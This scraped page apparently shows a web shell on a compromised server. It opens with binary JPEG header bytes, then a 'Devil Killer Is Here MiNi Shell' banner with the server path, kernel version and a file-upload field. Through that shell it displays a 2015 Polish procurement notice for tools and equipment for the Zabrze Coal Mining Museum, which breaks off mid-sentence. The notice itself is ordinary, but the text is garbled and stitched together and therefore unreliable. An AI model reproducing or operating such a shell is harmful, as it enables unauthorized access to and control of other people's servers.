JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150212/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150212/32036-N-2015.html

<p class="kh_header"><b>Zabrze: Sukcesywne dostawy narzędzi i akcesoriów   dla potrzeb Muzeum Górnictwa Węglowego w Zabrzu. Znak sprawy ZP/13/MGW/2015</b><br>
<b>Numer ogłoszenia: 32036 - 2015; data zamieszczenia: 12.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Górnictwa Węglowego w Zabrzu , ul. Jodłowa 59, 41-800 Zabrze, woj. śląskie, tel. 32 630 30 91, faks 32 277 11 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeumgornictwa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy narzędzi i akcesoriów   dla potrzeb Muzeum Górnictwa Węglowego w Zabrzu. Znak sprawy ZP/13/MGW/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy narzędzi i akcesoriów  dla potrzeb Muzeum Górnictwa Węglowego w Zabrzu. Zamówienie będzie realizowane po cenach jednostkowych zadeklarowanych w ofercie przedstawionych przez wykonawcę - stanowiącym załącznik nr 1 do niniejszej umowy - do wysokości środków budżetowych zabezpieczonych na  realizację powyższego zadania jeżeli nastąpi to przed dniem 31.03.2016 r., tj. do kwoty brutto: 213.283,96  zł PLN brutto (słownie: dwieście trzynaście tysięcy dwieście osiemdziesiąt trzy złote 96/100 ). Powyższa wartość ma charakter wartości maksymalnej. Zamawiający zastrzega sobie prawo do niewykorzystania pełnego zakresu umowy  tj. do niewykorzystania pełnej wartości umowy, a wykonawcy nie przysługuje prawo do jakichkolwiek roszczeń z tego tytułu.
Nazwa materiału:		
1 Zestaw śrubokrętów elektromonterskich,
2 Torba narzędziowa -Wykonana z tkaniny o wysokiej odporności na obtarcia i przetarcia
-Pas do przenoszenia
-Usztywnione dno
-Kieszenie wewnętrzne i zewnętrzne
-Długość: min 42cm
-Szerokość: min 22cm
-Wysokość: min 24cm,
3 Zestaw kluczy oczkowych ze stali CrV Rozmiary 6-7-8-9-10-11-12-13-14-15-16-17-18-19-21-22-24-27-30-32-36-42,
4 Zestaw kluczy płaskich ze stali CrV - Rozmiary 6-7-8-9-10-11-12-13-14-15-16-17-18-19-21-22-24-27-30-32-36-42,
5 Zestaw Kluczy 21 elementów 3/4, ze stali chromowo-wanadowej, chromowane, nasadki 19,21,22,23,24,26,27,29,30,32,35,36,38,41,46,50 mm,przedłużka 1100,200,400 mm,	
6 Zestaw kluczy imbusowych 9 el, stal chrom vanadium. Rozmiary: 3,4,5,6,8,10,12,14,17,19,22,24 mm. W metalowej skrzynce,
7 Klucz dynamometryczny 1/2 z przełącznikiem lewo/prawo automatycznie blokowany, słyszalny klik przy osiągnięciu wybranej wartości momentu z tolerancją +- 3%, zakres momentu obr: od 60 do 250 Nm, dwie skale do precyzyjnego ustawiania żądanej wartości,
8 Zestaw kluczy trójkątnych 6części rozmiary: 4,0; 5,0; 6,0; 8,0; 10,0; 12,0,
9 młotek ślusarski 1,0kg trzonek drewniany,
10 młotek ślusarski 1,5kg  trzonek drewniany,
11 Młotek ślusarski 5kg trzonek drewniany, 
12 Młot 10kg trzonek drewniany ślusarski,
13 Zestaw  -przecinaki 3szt. 10, 12, 16 mm
-wybijaki 7szt. 1.5 - 2 - 3 - 4 - 5 - 6 - 8 mm
-punktaki 2szt. 6, 8 mm
 Wykonane z stali chromowo-wanadowej CrV, 
14 Siekiera 800g kuty szlifowany obuch drewniany trzonek,
15 siekiera 1500g kuty szlifowany obuch drewniany trzonek,
16 SZPADEL SZTYCHÓWKA Z TRZONKIEM DREWNIANYM,
17 Wykonana z grubej blachy łopata piaskowa z trzonkiem drewnianym,
18 Imadło równoległe 150mm,
19 Kastra budowlana 40l plastykowy,
20 Piła do drewna poprzeczna typu moja twoja dł min 1m,
21 Poziomica budowlana długości 1m,
22 Młotek murarski typu berlińskiego 600g metalowy trzonek pokryty gumą,
23 Kielnia murarska trójkątna 220mm,
24 Paca styropianowa do zacierania 18x32,
25 taczka stalowa spawana 150l wraz z zestawem 10 szt kompletnych kół zapasowych, 
26 taczka stalowa zgrzewana lub wytłaczana 150l wraz z zestawem 10 szt kompletnych kół zapasowych, 
27 Stół warsztatowy wykonany z blachy o grubości min 0,8 mm malowanej farbą proszkową blat stołu wykonany ze sklejki o grubości min 40 mm, 3 szuflady na prowadnicach teleskopowych, pełny wysuw szuflad ze stołu, dopuszczalne obciążenie szuflad ok. 30 kg / szufladę, szafki zamykane na zamek (dwa kluczyki w komplecie), wewnątrz półki
nóżki z możliwością regulacji wysokości w zakresie 20 mm, wymiary: szerokość min 1400 mm  głębokość min 600 mm wysokość min 800 mm,
28 szczypce elektryczne 160mm z gumowanymi rączkami chroniącymi przed porażeniem elektrycznym do 1000V,	
29 Szczypce czołowe obcęgi 200mm z gumowanymi rączkami,
30 Szczotka druciana 4 rzędowa,
31 Szafka narzędziowa wisząca metalowa o wymiarach minimalnych: szer 80cm, wysokość 70cm, głębokość 20cm,  wykonane z blachy min 0,6mm malowane proszkowo.
W komplecie min.
- 1x półka
- 3x zawieszka (wiertła, klucze, wkrętaki)
- 3x haczyk 60mm
- Drzwiczki zamykane zamkiem na kluczyk (2 kluczyki w komplecie).
- Do każdej szafki instrukcja montażu w języku polskim,
32.  Szafka narzędziowa stojąca wykonana z blachy o grubości min 0,8 mm malowanej farba proszkową
 - szuflady na prowadnicach kulkowych
 - szuflady zamykane centralnym zamkiem lub zamykane zamkami osobnymi  (dwa kluczyki w komplecie)
- dwie szafki zamykane na zamek
- płyta robocza z wykładziną gumową
- wymiary minimalne : szerokość 1000 mm  głębokość 500 mm  wysokość 1000 mm,
34 Brzeszczoty do piłki ramowej do metalu 300mm,
34 Metrówka składana drewniana,
35 Taśma miernicza zwijana metalowa dł 5m, 
36 Taśma miernicza zwijana z włókna szklanego dł 50m, 
37 Nożyce do blachy proste , możliwość cięcia blachy o grubości do 1mm, 
38 Nożyce do cięcia prętów o grubości do 8mm,	
39 Kłódka jarzmowa z jarzmem hartowanym grubości min 5mm, korpus z mosiądzu,
40 kłódka jarzmowa z jarzmem hartowanym grubości min 10mm, korpus z mosiądzu,
41 Młotowiertarka maksymalna średnica wiercenia stal/beton(mm)13/26 - prędkość obrotów bez obciążenia(obr/min.) 0-1100,liczba udarów(obr/min) 0-4500, energia pojedynczego udaru(j) nie mniejsza niż 2,8, zasilanie akumulatorowe 36V, system mocowania SDS+,
42 Szlifierka kątowa średnica tarczy(mm)125, o parametrach minimalnych moc(W) 1300, napięcie elektryczne(V) 230, prędkość obrotowa(obr/min)11 000, gwint wrzeciona M14, stalowa przekładnia,
43 Wiertarka, stalowa przekładnia,  maksymalna średnica wiercenia: stal/drewno/beton(mm) 13/40/20,prędkość obrotowa(obr/min)0-1000, 0-3000, moc(W)790, liczba udarów(obr/min) 0-5 500, 0- 18 000, 	
44 Komplet wierteł do metalu HSS  25 elementów 1-13mmx0,5mm, 
45 Komplet wierteł do muru HSS 8szt, rozmiary 3/4/5/6/7/8/9/10/12mm, 
46 Komplet wierteł do betonu dwuostrzowe czterospiralne SDS-Plus rozmiary 5/6/8/10/12/14/16mm długości minimum 250mm, 
47 Komplet wierteł do betonu dwuostrzowe dwuspiralne SDS-Plus rozmiary 18/20/22/24mm długości minimum 250mm,	
48 tarcza do szlifierki kątowej  do kamienia 125mmx3mm, 
49 tarcza do szlifierki kątowej do cięcia metalu 125mmx1mm	,
50 tarcza do szlifierki kątowej do cięcia metalu 125mmx2,5mm,
51 Drabina aluminiowa rozstawna minimum 7 stopni minimum 2,5m wys.,
52 Pilarka  z prowadnicą łańcuchową 37cm w zestawie z dodatkową prowadnicą 18 i łańcuchami po 3 szt do każdej prowadnicy -  moc kW nie mniej niż 3,8, poj. skokowa(cm3)nie mniej niż 50,2,
53 Papier ścierny na płótnie gradacja 60 w arkuszu 230x280mm,
54 Papier ścierny na płótnie gradacja 80 w arkuszu 230x280mm,
55 Nagrzewnica elektryczna z nawiewem na napięcie 230V o mocy minimalnej 3000W,
56 Pompa odwadniająca w obudowie żeliwnej z przyłączem 52mm i pływakiem na napięcie 230v. Stopień ochrony minimum IP54, np. WQ15-7-1,1 z rozdrabniaczem,
57 tarcza do szlifierki kątowej do cięcia metalu 230mmx1,9mm,
58 szczotka stalowa doczołowa do wiertarki 75mm,
59 szczotka stalowa doczołowa do wiertarki 100mm,
60 Elektroda spawalnicza 3.2 rutylowa opak 5kg	,
61 Elektroda spawalnicza 2,5 rutylowa opak 5kg	,
62 Zestaw gwintowników i narzynek od M6 do M20 - regulowane pokrętło do gwintowników, pokrętło do narzynek, grzebień metryczny do mierzenia gwintów, wkrętak płaski.,
63 Klucz płaski 34-36,
64 Klucz płaski 46-50,
65 Wiertarka udarowa maksymalna średnica wiercenia: beton/drewno/stal(mm) 28/32/13, energia pojedynczego udaru(J) 3,5, prędkość obrotowa(obr/min) 0 -1050), liczba udarów(obr/min )0-4 000, moc (W) 720, napięcie (V) 230.	,
66 Szlifierka kątowa z płynnym startem, średnica tarczy (MM) 230, moc (W) 2400, napięcie elektryczne (V) 230, prędkość obrotowa(obr/min) 6600, gwint wrzeciona M 14.	,
67 Okulary spawalnicze ochronne z atestem,
68 Tarcza do szlifierki kątowej do szlifowania metalu 230mmx6mm,
69 Tarcza do szlifierki kątowej do szlifowania metalu 125mmx6mm,
70 Szlifierka kątowa, Urządzenie akumulatorowe, napięcie akumulatora 18V, szlifowanie-cięcie, średnica tarczy (mm) 115, otwór (mm ) 22.,
71 Pilarka tarczowa, średnica tarczy zew. /wew. (mm) 165/30, maks.,
72 Komplet wierteł do betonu czteroostrzowe, dwuspiralne SDS-MAX rozmiary 12/14/16/18/22/24mm długości minimum 50cm,
73 Komplet wierteł do betonu czteroostrzowe, dwuspiralne SDS-MAX rozmiary 16/18/22mm długości minimum 75cm,	
74 Komplet wierteł do betonu czteroostrzowe, dwuspiralne SDS-MAX rozmiary 22/25mm długości minimum 100cm,
75 Komplet wierteł do betonu czteroostrzowe, dwuspiralne SDS-MAX rozmiary 12/14mm długości minimum 30cm,
76 Młotowiertarka ,
77 Piła elektryczna stołowa do drewna na napięcie 400V o średnicy tarczy 500mm; wysokość cięcia minimum 170mm; moc silnika minimum 5KW; wymiary stołu głównego minimum 1000x500mm, w komplecie tarcza do drewna 500mm,
78 Betoniarka o pojemności 150l, napięcie zasilania 230v, instalacja elektryczna w stopniu ochrony IP54,
79 Maska spawalnicza samościemniająca..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 44.51.00.00-8, 43.80.00.00-1, 42.65.20.00-1, 31.70.00.00-3, 43.81.20.00-8, 43.41.30.00-1, 18.14.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku  w ww. zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp a jego weryfikacja zostanie przeprowadzona wg formuły: (spełnia)-(nie spełnia).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku  w ww. zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp a jego weryfikacja zostanie przeprowadzona wg formuły: (spełnia)-(nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku  w ww. zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp a jego weryfikacja zostanie przeprowadzona wg formuły: (spełnia)-(nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku  w ww. zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp a jego weryfikacja zostanie przeprowadzona wg formuły: (spełnia)-(nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku  w ww. zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp a jego weryfikacja zostanie przeprowadzona wg formuły: (spełnia)-(nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. Zmiany terminu wykonania zamówienia oraz  terminów pośrednich, w następujących przypadkach:
1.1. zmiany terminu wykonania zamówienia oraz  terminów pośrednich, w następujących przypadkach:
a. wystąpienie wydarzenia nieprzewidywalnego, pozostającego poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu;
b. zmian istotnych przepisów prawa Unii Europejskiej lub prawa krajowego powodujących konieczność dostosowania dokumentacji do zmiany przepisów, które nastąpiły w trakcie realizacji zamówienia;
c. zmiana sposobu reprezentacji z przyczyn niezależnych od Zamawiającego i Wykonawcy,
d. wystąpienie okoliczności, których Strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności;
1.2. w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
a. zmiana podwykonawców w tym podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem, że nowy podwykonawca  wykaże  spełnianie warunków w zakresie nie mniejszym niż wymagane w SIWZ;
b. wprowadzenie dodatkowego podwykonawcy pod warunkiem uzyskania zgody zamawiającego i spełnienia  warunków w zakresie nie mniejszym niż wymagane w SIWZ;
c. ustawowa zmiana stawki podatku VAT, której zastosowania nie będzie skutkowało zmianą wartości brutto umowy,
d. poprawa jakości lub innych parametrów charakterystycznych dla danego elementu przedmiotu zamówienia, poprawa ta musi zostać stwierdzona przez Zamawiającego, jednakże nie może powodować zmian w wynagrodzeniu,
2. Wszelkie spory mogące wyniknąć przy realizacji umowy strony poddają pod jurysdykcję sądu właściwego dla siedziby Zamawiającego.
3. W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn, o których mowa wyżej, Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i  wystąpienia z wnioskiem o dokonanie wskazanej zmiany.
4. Okoliczności stanowiące podstawę do zmiany do umowy Wykonawca sporządzi protokół, który zostanie obustronnie podpisany.
5. Zmiana umowy powinna nastąpić w formie pisemnego aneksu sporządzonego przez Zamawiającego i podpisanego przez strony umowy, pod rygorem nieważności oraz powinna zawierać uzasadnienie faktyczne i prawne.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeumgornictwa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Górnictwa Węglowego w Zabrzu
Dział Zamówień Publicznych
ul. Jodłowa 59, 41-800 Zabrze
Sekretariat pok. 1.02..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2015 godzina 10:00, miejsce: Muzeum Górnictwa Węglowego w Zabrzu
Dział Zamówień Publicznych
ul. Jodłowa 59, 41- 800 Zabrze
Sekretariat pok. Nr 1.02.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Zawartość oferty 1.Oferta, zastrzeżeniem pkt 10.6.2 i 10.7 SIWZ , musi zawierać: 1) Formularz oferty wraz z oświadczeniem o spełnieniu warunków udziału w postępowaniu (część A wg Spisu zawartości oferty) złożony w formie oryginału; 2) Oświadczenie o braku podstaw do wykluczenia (część B wg Spisu zawartości oferty) złożone w formie oryginału; 3) Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu wymienione w pkt 5.2. (5.2.1.; 5.2.2.) i 5.3 SIWZ (jeżeli dotyczy) , złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę; 4) Kalkulacja ceny (część D wg Spisu zawartości oferty); 5) Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby niezbędne do realizacji zamówienia (Załącznik nr 2); 6) oświadczenie o przynależności wraz z listą podmiotów należących do tej samej grupy kapitałowej lub braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50 poz. 331 z późn. zm.) (załącznik nr C), 2. Oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi zawierać: 1) wspólny formularz oferty wraz z oświadczeniem o spełnieniu warunków udziału w postępowaniu (część A wg Spisu zawartości oferty), złożony w formie oryginału; 2) oświadczenie o braku podstaw do wykluczenia (część B wg Spisu zawartości oferty), złożone przez każdego z wykonawców wspólnie ubiegających się o zamówienia - złożone w formie oryginału; 3) dokumenty potwierdzające spełnienie warunków udziału w postępowaniu wymienione w pkt 5.2. (5.2.1.; 5.2.2.) i 5.3 SIWZ (jeżeli dotyczy). Dokumenty muszą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę, przy czym: A) każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa dokumenty stanowiące Załączniki nr 1.1; wg Spisu zawartości oferty; 4) wspólną kalkulację ceny (część D wg Spisu zawartości oferty); 5) Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby niezbędne do realizacji zamówienia (Załącznik nr 2); 6) oświadczenie o przynależności wraz z listą podmiotów należących do tej samej grupy kapitałowej lub braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50 poz. 331 z późn. zm.) złożone w formie oryginału, przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (załącznik nr C), II. Oferta musi być podpisana przez osoby uprawnione do składania oświadczeń woli w imieniu Wykonawcy, tj. : 1) osoby uprawnione zgodnie z aktualnym odpisem z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej lub 2) osoby posiadające ważne pełnomocnictwo, którego oryginał, lub kopię poświadczoną notarialnie za zgodność z oryginałem, lub odpis albo wyciąg z dokumentu sporządzony przez notariusza -należy załączyć w ofercie: a) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) - jako Załącznik nr 1.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, jeśli 